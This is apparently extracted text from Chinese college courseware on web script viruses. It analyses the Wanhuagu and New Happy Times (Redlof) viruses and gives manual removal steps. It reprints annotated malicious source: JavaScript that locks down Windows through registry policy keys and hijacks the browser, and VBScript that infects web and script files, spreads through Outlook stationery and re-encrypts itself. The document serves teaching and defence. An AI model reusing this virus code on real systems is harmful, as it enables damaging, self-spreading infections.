典型网页病毒剖析课件

计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组教学单元3-4网页脚本病毒防治

万花谷病毒的手工清除

万花谷病毒特点及代码分析梅丽莎病毒特点及代码分析第二讲典型网页病毒剖析计算机病毒与防治课程小组

梅丽莎病毒的手工清除教学单元3-4网页脚本病毒防治万花谷病毒的手工清除万万花谷病毒特点计算机病毒与防治课程小组病毒类型网页脚本病毒危险级别★★★★★影响系统Win9X/ME/NT/2000/XP/2003

万花谷病毒特点病毒名称:万花谷万花谷病毒特点计算机病毒与防治课程小组病毒类型网页脚本病万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一个美丽诱人的网址“万花谷”，这实际是一个恶意“陷阱”，有人经不住诱惑，只用鼠标轻轻点一下，计算机就立即瘫痪了，这是有人利用Java最新技术进行破坏的一个恶意网址。

本病毒是在页面中嵌入了恶意的JavaScript代码，它最初出现在个人网站上，随后其他一些个人主页也模仿或被感染了该病毒代码。万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：(1)用户不能正常使用WINDOWS的DOS功能程序；(2)用户不能正常退出WINDOWS；(3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽，防止用户重新以DOS方式启动，关闭DOS命令、关闭REGEDIT命令等。(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。具体的表现形式是：(1)网络地址是：；(2)在IE的“收藏夹”中自动加上“万花谷”的快捷方式,网络地址是：http://96；万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：万花谷万花谷病毒源码分析计算机病毒与防治课程小组document.write("<APPLETHEIGHT=0WIDTH=0Code=com.ms.activeX.ActiveXComponent></APPLET>");

function

AddFavLnk(loc,

DispName,

SiteURL)

{

var

Shor

=

Shl.CreateShortcut(loc

+

"\\"

+

DispName

+".URL");

Shor.TargetPath

=

SiteURL;Shor.Save();

}

function

f(){

Try

{

//ActiveX

initialization

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl

=

a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();

FSO

=

a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net

=

a1.GetObject();

万花谷病毒源码分析计算机病毒与防治课程小组document.万花谷病毒源码分析计算机病毒与防治课程小组try

{

if

(documents

.cookies.indexOf("Chg")

==

-1)

{

//以下内容是对注册表进行修改Shl.RegWrite

("HKCU\\Software\\Microsoft\\Internet

Explorer\\Main\\Start

Page","/");

var

expdate

=

new

Date((new

Date()).getTime()

+

(1));

documents.cookies="Chg=general;

expires="

+

expdate.toGMTString()

+

";

path=/;"

//设置IE主页Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun",

01,

"REG_BINARY");

//消除RUN按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose",

01,

"REG_BINARY");

//消除关闭按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff",

01,

"REG_BINARY");

//消除注销按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives",

"63000000",

"REG_DWord");

//隐藏盘符万花谷病毒源码分析计算机病毒与防治课程小组try

{

万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",

"00000001",

"REG_DWORD");

//禁止注册表编辑器Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop",

"00000001",

"REG_DWORD");

//屏蔽所有桌面图标Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled",

"00000001",

"REG_DWORD");

//禁止运行Dos程序Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode",

"00000001",

"REG_DWORD");//屏蔽所有桌面图标Shl.RegWrite

("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption",

"您的计算机已经被/优化:

）");//设置开机提示Shl.RegWrite

("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText",

"您的计算机已经被/优化:）");//弹出窗口中的内容万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWr万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite

("HKLM\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title","新的标题★/

&

/");Shl.RegWrite

("HKCU\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title","新的标题★/

&

/");//设置IE标题

var

expdate

=

new

Date((new

Date()).getTime()

+

(1));documents

.cookies="Chg=general;

expires="

+

expdate.toGMTString()

+

";

path=/;"

}}

catch(e){}}

catch(e){}}function

init(){setTimeout("f()",

1000);}init();万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWr万花谷病毒发作现象计算机病毒与防治课程小组万花谷病毒发作部分现象截图未中万花谷病毒时截图万花谷病毒发作现象计算机病毒与防治课程小组万花谷病毒发作部分万花谷病毒手工清除计算机病毒与防治课程小组方法一(利用Windows提供的恢复注册表功能)：

在“开始->运行”中输入Regedit命令，打开注册表编辑器，点选“文件”菜单下的“导入”命令，选择以前备份的注册表文件，确定即可完成注册表的还原。方法二(采用VBS或JS脚本来删除或修改注册表项)：

进入系统后打开记事本，输入以下内容：

万花谷病毒手工清除计算机病毒与防治课程小组方法一(利用Wi万花谷病毒手工清除计算机病毒与防治课程小组DimR

SetR=CreateObject("WScript.Shell")

RemWriteRegedit

R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_BINARY"

；修复RUN按纽R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_BINARY"

；修复关闭按纽R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_BINARY"

；修复注销按纽R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives","00000000","REG_DWORD"

；取消隐藏盘符R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD"

；取消禁止注册表R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop“,”00000000“,”REG_DWORD“；万花谷病毒手工清除计算机病毒与防治课程小组DimR

万花谷病毒手工清除R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled","00000000","REG_DWORD"

R.RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode","00000000","REG_DWORD"

R.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","","REG_SZ"

R.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","","REG_SZ"

；重设开机提示R.RegWrite“HKLM\Software\Microsoft\InternetExplorer\MainWindow\Title”,“”,"REG_SZ"

；重设IE标题R.RegWrite"HKCU\Software\Microsoft\InternetExplorer\MainStart\Page","","REG_SZ“

以文件名“RegClean.vbs”存盘后双击运行该文件。重新启动计算机即完成系统恢复。计算机病毒与防治课程小组万花谷病毒手工清除R.RegWrite"HKCU\Soft新欢乐时光病毒特点病毒名称：新欢乐时光病毒类型：网页脚本病毒危险级别：★★★★★影响系统：Win9X/ME/NT/2000

英文名包括有：HTML.Redlof.A[Symantec],VBS.Redlof[AVP],VBS_REDLOF.A[Trend],VBS/Redlof-A[Sophos],VBS.KJ[金山],Script.RedLof[瑞星],VBS/KJ[江民]计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒特点病毒名称：新欢乐时光病毒类型：新欢乐时光病毒特点新欢乐时光病毒是一个多变形、加密病毒，感染扩展名为.html,.htm,.asp,.php,.jsp,.htt和.vbs文件，同时该病毒会大量生成folder.htt和desktop.ini，并在%windir%System中生成一个名字叫Kernel.dll（Windows9x/Me）或kernel32.dll（WindowsNT/2000）的文件，修改.dll文件的打开方式，感染Outlook的信纸文件。感染这个病毒后有两个明显的特征：a.在每个目录中都会生成folder.htt（带毒文件）和desktop.ini（目录配置文件）；b.电脑运行速度明显变慢，在任务列表中可以看到有大量的Wscript.exe程序在运行。计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒是一个多变形、加密病毒，感染新欢乐时光病毒特点新欢乐时光病毒——这个网页病毒利用微软IE的漏洞，通过感染一些.html,.htm,.asp,.php,.jsp,.htt和.vbs等文件进行传播。然而由于病毒的本身特性，其传播的途径也有多种：a.通过网页传播。由于病毒会感染网页文件，如果那些网站站长不小心将带毒的网页放到网站上，用户不小心浏览了这些网页就会被病毒感染了；b.通过局域网。当本地计算机设有可写权限的共享目录，或者访问局域网上带毒的计算机的时候就会感染病毒；对于WindowsNT/2000系统，由于存在默认的管理用共享目录，因此，管理员的疏忽也可能会造成感染。c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸，或者信件中有带毒的网页文件，那么，只要收件人浏览了邮件，也会被感染病毒；d.通过移动介质，如软盘、移动硬盘、光盘等。由于病毒会生成folder.htt和desktop.ini，所以在打开移动介质或打开其文件夹的时候，就会激活并感染病毒。计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒——这个网页病毒利用微软IE新欢乐时光代码分析DimInWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDiskSubKJ_start()'初始化变量

KJSetDim()'初始化环境

KJCreateMilieu()'感染本地或者共享上与html所在目录

KJLikeIt()'通过vbs感染Outlook邮件模板

KJCreateMail()'进行病毒传播KJPropagate()EndSub计算机病毒与防治课程小组新欢乐时光病毒主运行程序代码新欢乐时光代码分析DimInWhere,HtmlText,新欢乐时光代码分析FunctionKJAppendTo(FilePath,TypeStr)OnErrorResumeNext'以只读方式打开指定文件SetReadTemp=FSO.OpenTextFile(FilePath,1)'将文件内容读入到TmpStr变量中

TmpStr=ReadTemp.ReadAll‘判断文件中是否存在“KJ_start()”字符串，若存在说明已经感染，退出函数；若文件长度小于1，也退出函数。IfInstr(TmpStr,"KJ_start()")<>0OrLen(TmpStr)<1ThenReadTemp.CloseExitFunctionEndIf‘如果传过来的类型是“htt“，

在文件头加上调用页面的时候加载KJ_start()函数;在文件尾追加html版本的加密病毒体。如果是”html”:在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;如果是"vbs":在文件尾追加vbs版本的病毒体

IfTypeStr="htt"ThenReadTemp.CloseSetFileTemp=FSO.OpenTextFile(FilePath,2)FileTemp.Write"<"&"BODYonload="""&"vbscript:"&"KJ_start()"""&">"&vbCrLf&TmpStr&vbCrLf&HtmlText‘函数功能：向指定类型的指定文件追加病毒计算机病毒与防治课程小组新欢乐时光代码分析FunctionKJAppendTo(FFileTemp.CloseSetFAttrib=FSO.GetFile(FilePath)FAttrib.attributes=34ElseReadTemp.CloseSetFileTemp=FSO.OpenTextFile(FilePath,8)IfTypeStr="html"ThenFileTemp.WritevbCrLf&"<"&"HTML>"&vbCrLf&"<"&"BODYonload="""&"vbscript:"&"KJ_start()"""&">"&vbCrLf&HtmlTextElseIfTypeStr="vbs"ThenFileTemp.WritevbCrLf&VbsTextEndIfFileTemp.CloseEndIfEndFunction新欢乐时光代码分析计算机病毒与防治课程小组FileTemp.Close新欢乐时光代码分析计算机病毒与新欢乐时光代码分析计算机病毒与防治课程小组‘函数功能：改变子目录以及盘符FunctionKJChangeSub(CurrentString,LastIndexChar)'判断是否是根目录

IfLastIndexChar=0Then‘如果是根目录：如果是C:\，返回FinalyDisk盘，并将SubE置为0’如果不是C:\，返回将当前盘符递减1，并将SubE置为0IfLeft(LCase(CurrentString),1)=<LCase("c")ThenKJChangeSub=FinalyDisk&":\"SubE=0ElseKJChangeSub=Chr(Asc(Left(LCase(CurrentString),1))-1)&":\"SubE=0EndIfElse

‘如果不是根目录，则返回上一级目录名称

KJChangeSub=Mid(CurrentString,1,LastIndexChar)EndIfEndFunction新欢乐时光代码分析计算机病毒与防治课程小组‘函数功能：改变子新欢乐时光代码分析计算机病毒与防治课程小组FunctionKJCreateMail()OnErrorResumeNext'如果当前执行文件是"html"的，就退出函数IfInWhere="html"ThenExitFunctionEndIf'取系统盘的空白页的路径ShareFile=Left(WinPath,3)&"ProgramFiles\CommonFiles\MicrosoftShared\Stationery\blank.htm"‘如果存在这个文件，就向其追加病毒体,否则生成含有病毒体的文件If(FSO.FileExists(ShareFile))ThenCallKJAppendTo(ShareFile,"html")ElseSetFileTemp=FSO.OpenTextFile(ShareFile,2,true)FileTemp.Write"<"&"HTML>"&vbCrLf&"<"&"BODYonload="""&"vbscript:"&"KJ_start()"""&">"&vbCrLf&HtmlTextFileTemp.CloseEndIf‘功能：感染邮件部分新欢乐时光代码分析计算机病毒与防治课程小组Function新欢乐时光代码分析计算机病毒与防治课程小组'取得当前用户的ID和OutLook的版本DefaultId=WsShell.RegRead("HKEY_CURRENT_USER\Identities\DefaultUserID")OutLookVersion=WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\OutlookExpress\MediaVer")'激活信纸功能，并感染所有信纸WsShell.RegWrite"HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\OutlookExpress\"&Left(OutLookVersion,1)&".0\Mail\ComposeUseStationery",1,"REG_DWORD"CallKJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\OutlookExpress\"&Left(OutLookVersion,1)&".0\Mail\StationeryName",ShareFile)CallKJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\OutlookExpress\"&Left(OutLookVersion,1)&".0\Mail\WideStationeryName",ShareFile)新欢乐时光代码分析计算机病毒与防治课程小组'取得当前用户的新欢乐时光代码分析计算机病毒与防治课程小组WsShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"CallKJMailReg("HKEY_CURRENT_USER\Software\Microsoft\WindowsMessagingSubsystem\Profiles\MicrosoftOutlookInternetSettings\0a0d020000000000c000000000000046\001e0360","blank")CallKJMailReg("HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\WindowsMessagingSubsystem\Profiles\MicrosoftOutlookInternetSettings\0a0d020000000000c000000000000046\001e0360","blank")WsShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"CallKJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")KJummageFolder(Left(WinPath,3)&"ProgramFiles\CommonFiles\MicrosoftShared\Stationery")EndFunction新欢乐时光代码分析计算机病毒与防治课程小组WsShell.R新欢乐时光代码分析计算机病毒与防治课程小组FunctionKJCreateMilieu()OnErrorResumeNextTempPath=""'判断操作系统是NT/2000还是9XIfNot(FSO.FileExists(WinPath&"WScript.exe"))ThenTempPath="system32\"EndIf‘为了文件名起到迷惑性，并且不会与系统文件冲突。如果是NT/2000则启动文件为system\Kernel32.dll，如果是9x启动文件则为system\Kernel.dllIfTempPath="system32\"ThenStartUpFile=WinPath&"SYSTEM\Kernel32.dll"ElseStartUpFile=WinPath&"SYSTEM\Kernel.dll"EndIf'添加Run值，添加刚才生成的启动文件路径WsShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile'功能：创建系统环境新欢乐时光代码分析计算机病毒与防治课程小组Function新欢乐时光代码分析计算机病毒与防治课程小组'拷贝前期备份的文件到原来的目录

FSO.CopyFileWinPath&"web\kjwall.gif",WinPath&"web\Folder.htt"FSO.CopyFileWinPath&"system32\kjwall.gif",WinPath&"system32\desktop.ini"'向%windir%\web\Folder.htt追加病毒体

CallKJAppendTo(WinPath&"web\Folder.htt","htt")'改变dll的MIME头,改变dll的默认图标,改变dll的打开方式WsShell.RegWrite"HKEY_CLASSES_ROOT\.dll\","dllfile"WsShell.RegWrite"HKEY_CLASSES_ROOT\.dll\ContentType","application/x-msdownload"WsShell.RegWrite"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")WsShell.RegWrite"HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"WsShell.RegWrite"HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath&TempPath&"WScript.exe""%1""%*"新欢乐时光代码分析计算机病毒与防治课程小组'拷贝前期备份的新欢乐时光代码分析计算机病毒与防治课程小组WsShell.RegWrite"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"WsShell.RegWrite"HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"'启动时加载的病毒文件中写入病毒体SetFileTemp=FSO.OpenTextFile(StartUpFile,2,true)FileTemp.WriteVbsTextFileTemp.CloseEndFunction新欢乐时光代码分析计算机病毒与防治课程小组WsShell.R新欢乐时光代码分析计算机病毒与防治课程小组功能：针对html文件进行处理，如果访问的是本地的或者共享上的文件，感染目录FunctionKJLikeIt()'如果当前执行文件不是"html"的就退出程序

IfInWhere<>"html"ThenExitFunctionEndIfThisLocation=document.location‘取得文档当前路径IfLeft(ThisLocation,4)=“file”Then‘如果是本地或网上共享文件

ThisLocation=Mid(ThisLocation,9)'如果这个文件扩展名不为空，在ThisLocation中保存它的路径IfFSO.GetExtensionName(ThisLocation)<>""thenThisLocation=Left(ThisLocation,Len(ThisLocation)-Len(FSO.GetFileName(ThisLocation)))EndIfIfLen(ThisLocation)>3Then'如果ThisLocation的长度大于3就尾追一个"\"ThisLocation=ThisLocation&"\"EndIfKJummageFolder(ThisLocation)'感染这个目录EndIfEndFunction

新欢乐时光代码分析计算机病毒与防治课程小组功能：针对html新欢乐时光代码分析计算机病毒与防治课程小组功能：如果注册表指定键值不存在，则向指定位置写入指定文件名FunctionKJMailReg(RegStr,FileName)OnErrorResumeNext'如果注册表指定键值不存在，则向指定位置写入指定文件名

RegTempStr=WsShell.RegRead(RegStr)IfRegTempStr=""ThenWsShell.RegWriteRegStr,FileNameEndIfEndFunction

新欢乐时光代码分析计算机病毒与防治课程小组功能：如果注册表指新欢乐时光代码分析计算机病毒与防治课程小组功能：遍历并返回目录路径FunctionKJOboSub(CurrentString)SubE=0TestOut=0DoWhileTrueTestOut=TestOut+1IfTestOut>28ThenCurrentString=FinalyDisk&":\"ExitDoEndIfOnErrorResumeNext'取得当前目录的所有子目录，并且放到字典中SetThisFolder=FSO.GetFolder(CurrentString)SetDicSub=CreateObject("Scripting.Dictionary")SetFolders=ThisFolder.SubFoldersFolderCount=0ForEachTempFolderinFoldersFolderCount=FolderCount+1DicSub.addFolderCount,TempFolder.NameNext新欢乐时光代码分析计算机病毒与防治课程小组功能：遍历并返回目新欢乐时光代码分析计算机病毒与防治课程小组'如果没有子目录了，就调用KJChangeSub返回上一级目录或者更换盘符，并将SubE置1IfDicSub.Count=0ThenLastIndexChar=InstrRev(CurrentString,"\",Len(CurrentString)-1)SubString=Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)CurrentString=KJChangeSub(CurrentString,LastIndexChar)SubE=1Else'如果存在子目录'如果SubE为0，则将CurrentString变为它的第1个子目录IfSubE=0ThenCurrentString=CurrentString&DicSub.Item(1)&"\"ExitDoElse

'如果SubE为1，继续遍历子目录，并将下一个子目录返回j=0新欢乐时光代码分析计算机病毒与防治课程小组'如果没有子目录新欢乐时光代码分析计算机病毒与防治课程小组Forj=1ToFolderCountIfLCase(SubString)=LCase(DicSub.Item(j))ThenIfj<FolderCountThenCurrentString=CurrentString&DicSub.Item(j+1)&"\"ExitDoEndIfEndIfNextLastIndexChar=InstrRev(CurrentString,"\",Len(CurrentString)-1)SubString=Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)CurrentString=KJChangeSub(CurrentString,LastIndexChar)EndIfEndIfLoopKJOboSub=CurrentStringEndFunction新欢乐时光代码分析计算机病毒与防治课程小组Forj=1新欢乐时光代码分析计算机病毒与防治课程小组功能：病毒传播FunctionKJPropagate()OnErrorResumeNextRegPathvalue="HKEY_LOCAL_MACHINE\Software\Microsoft\OutlookExpress\Degree"DiskDegree=WsShell.RegRead(RegPathvalue)'如果不存在Degree这个键值，DiskDegree则为FinalyDisk盘

IfDiskDegree=""ThenDiskDegree=FinalyDisk&":\"EndIf'继DiskDegree置后感染5个目录Fori=1to5DiskDegree=KJOboSub(DiskDegree)KJummageFolder(DiskDegree)Next'将感染记录保存在"HKEY_LOCAL_MACHINE\Software\Microsoft\OutlookExpress\Degree"键值中WsShell.RegWriteRegPathvalue,DiskDegreeEndFunction新欢乐时光代码分析计算机病毒与防治课程小组功能：病毒传播Fu新欢乐时光代码分析计算机病毒与防治课程小组功能：感染指定目录FunctionKJummageFolder(PathName)OnErrorResumeNext'取得目录中的所有文件集

SetFolderName=FSO.GetFolder(PathName)SetThisFiles=FolderName.FilesHttExists=0ForEachThisFileInThisFilesFileExt=UCase(FSO.GetExtensionName(ThisFile.Path))‘判断扩展名若是HTM,HTML,ASP,PHP,JSP则向文件中追加HTML版的病毒体‘若是VBS则向文件中追加VBS版的病毒体若是HTT,则标志为已经存在HTT了

IfFileExt="HTM"OrFileExt="HTML"OrFileExt="ASP"OrFileExt="PHP"OrFileExt="JSP"ThenCallKJAppendTo(ThisFile.Path,"html")ElseIfFileExt="VBS"ThenCallKJAppendTo(ThisFile.Path,"vbs")ElseIfFileExt="HTT"ThenHttExists=1EndIfNext新欢乐时光代码分析计算机病毒与防治课程小组功能：感染指定目录新欢乐时光代码分析计算机病毒与防治课程小组'如果所给的路径是桌面，则标志为已经存在HTT了

If(UCase(PathName)=UCase(WinPath&"Desktop\"))Or(UCase(PathName)=UCase(WinPath&"Desktop"))ThenHttExists=1EndIf'如果不存在HTT'向目录中追加病毒体

IfHttExists=0ThenFSO.CopyFileWinPath&"system32\desktop.ini",PathNameFSO.CopyFileWinPath&"web\Folder.htt",PathNameEndIfEndFunction

新欢乐时光代码分析计算机病毒与防治课程小组'如果所给的路径新欢乐时光代码分析计算机病毒与防治课程小组功能：定义FSO,WsShell对象,取得最后一个可用磁盘卷标,生成传染用的加密字串备份系统中的web\folder.htt和system32\desktop.iniFunctionKJSetDim()OnErrorResumeNextErr.Clear'测试当前执行文件是html还是vbsTestIt=WScript.ScriptFullnameIfErrThenInWhere="html"ElseInWhere="vbs"EndIf'创建文件访问对象和Shell对象IfInWhere="vbs"ThenSetFSO=CreateObject("Scripting.FileSystemObject")SetWsShell=CreateObject("WScript.Shell")Else新欢乐时光代码分析计算机病毒与防治课程小组功能：定义FSO,新欢乐时光代码分析计算机病毒与防治课程小组SetAppleObject=document.applets("KJ_guest")AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")AppleObject.createInstance()SetWsShell=AppleObject.GetObject()AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")AppleObject.createInstance()SetFSO=AppleObject.GetObject()EndIf

SetDiskObject=FSO.Drives'判断磁盘类型'0:Unknown,1:Removable,2:Fixed,3:Network,4:CD-ROM,5:RAMDisk'如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、CD-ROM、RAMDisk都是在比较靠后的位置。呵呵，如果C:是RAMDISK会怎么样？ForEachDiskTempInDiskObjectIfDiskTemp.DriveType<>2AndDiskTemp.DriveType<>1ThenExitForEndIfFinalyDisk=DiskTemp.DriveLetterNext新欢乐时光代码分析计算机病毒与防治课程小组SetApple新欢乐时光代码分析计算机病毒与防治课程小组‘此前的这段病毒体已经解密，并且存放在ThisText中，现在为了传播，需要对它进行再加密。DimOtherArr(3)Randomize'随机生成4个算子

Fori=0To3OtherArr(i)=Int((9*Rnd))NextTempString=""Fori=1ToLen(ThisText)TempNum=Asc(Mid(ThisText,i,1))IfTempNum=13Then‘对回车、换行(0x0D,0x0A)做特别的处理TempNum=28ElseIfTempNum=10ThenTempNum=29EndIf‘很简单的加密处理，每个字符减去相应的算子，那么在解密的时候只要按照这个顺序每个字符加上相应的算子就可以了。新欢乐时光代码分析计算机病毒与防治课程小组‘此前的这段病毒新欢乐时光代码分析计算机病毒与防治课程小组TempChar=Chr(TempNum-OtherArr(iMod4))IfTempChar=Chr(34)ThenTempChar=Chr(18)EndIfTempString=TempString&TempCharNext

'含有解密算法的字串UnLockStr="Execute(""DimKeyArr(3),ThisText""&vbCrLf&""KeyArr(0)="&OtherArr(0)&"""&vbCrLf&""KeyArr(1)="&OtherArr(1)&"""&vbCrLf&""KeyArr(2)="&OtherArr(2)&"""&vbCrLf&""KeyArr(3)="&OtherArr(3)&"""&vbCrLf&""Fori=1ToLen(ExeString)""&vbCrLf&""TempNum=Asc(Mid(ExeString,i,1))""&vbCrLf&""IfTempNum=18Then""&vbCrLf&""TempNum=34""&vbCrLf&""EndIf""&vbCrLf&""TempChar=Chr(TempNum+KeyArr(iMod4))""&vbCrLf&""IfTempChar=Chr(28)Then""&vbCrLf&""TempChar=vbCr""&vbCrLf&""ElseIfTempChar=Chr(29)Then""&vbCrLf&""TempChar=vbLf""&vbCrLf&""EndIf""&vbCrLf&""ThisText=ThisText&TempChar""&vbCrLf&""Next"")"&vbCrLf&"Execute(ThisText)"新欢乐时光代码分析计算机病毒与防治课程小组TempChar新欢乐时光代码分析计算机病毒与防治课程小组'将加密好的病毒体复制给变量ThisTextThisText="ExeString="""&TempString&""""'生成html感染用的脚本

HtmlText="<"&"scriptlanguage=vbscript>"&vbCrLf&"document.write"&""""&"<"&"divstyle='position:absolute;left:0px;top:0px;width:0px;height:0px;z-index:28;visibility:hidden'>"&"<""&"""&"APPLETNAME=KJ""&""_guestHEIGHT=0WIDTH=0code=com.ms.""&""activeX.Active""&""XComponent>"&"<"&"/APPLET>"&"<"&"/div>"""&vbCrLf&"<"&"/script>"&vbCrLf&"<"&"scriptlanguage=vbscript>"&vbCrLf&ThisText&vbCrLf&UnLockStr&vbCrLf&"<"&"/script>"&vbCrLf&"<"&"/BODY>"&vbCrLf&"<"&"/HTML>"'生成vbs感染用的脚本VbsText=ThisText&vbCrLf&UnLockStr&vbCrLf&"KJ_start()"

'取得Windows目录:GetSpecialFolder(n),0:WindowsFolder,1:SystemFolder,2:TemporaryFolder新欢乐时光代码分析计算机病毒与防治课程小组'将加密好的病毒新欢乐时光代码分析计算机病毒与防治课程小组'如果系统目录存在web\Folder.htt和system32\desktop.ini，则用kjwall.gif文件名备份它们。

WinPath=FSO.GetSpecialFolder(0)&"\"If(FSO.FileExists(WinPath&"web\Folder.htt"))ThenFSO.CopyFileWinPath&"web\Folder.htt",WinPath&"web\kjwall.gif"EndIfIf(FSO.FileExists(WinPath&"system32\desktop.ini"))ThenFSO.CopyFileWinPath&"system32\desktop.ini",WinPath&"system32\kjwall.gif"EndIfEndFunction

新欢乐时光代码分析计算机病毒与防治课程小组'如果系统目录存新欢乐时光行为分析中毒现象截图新欢乐时光行为分析中新欢乐时光手工清除当计算机感染了“欢乐时光”病毒后建议在安全模式或纯DOS中清除。因为该病毒在安全模式下不会被激活，所以可以放心地在安全模式下杀毒；在正常模式中清除需要对Windows系统有非常深入地了解，一般用户是很难干净地清除病毒的；推荐使用专杀工具在安全模式下进行杀毒，并且，在确认清除完成之前不要使用“Web视图”显示任何文件夹，比较稳妥的做法是在进入安全模式之前将所有的Web视图文件夹改为传统Windows风格。在检查病毒的时候，建议同时检查平时常用的移动存储介质，如光盘、软盘、移动硬盘等，因为这是病毒重复感染的隐患。对于联网的计算机，杀毒之前建议取消所有的共享目录。手工清除新欢乐时光病毒新欢乐时光手工清除当计算机感染了“欢乐时光”病毒后建议在安全新欢乐时光手工清除在Windows正常模式下可以采取如下的步骤进行清除。（1）打开注册表编辑器，删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32键值；（2）参照其他系统，恢复HKEY_CLASSES_ROOT\dllFile\下键值；参照其他系统，恢复HKEY_CURRENT_USER\Identities\"&UserID&"\Software\Microsoft\OutlookExpress\"&OEVersion

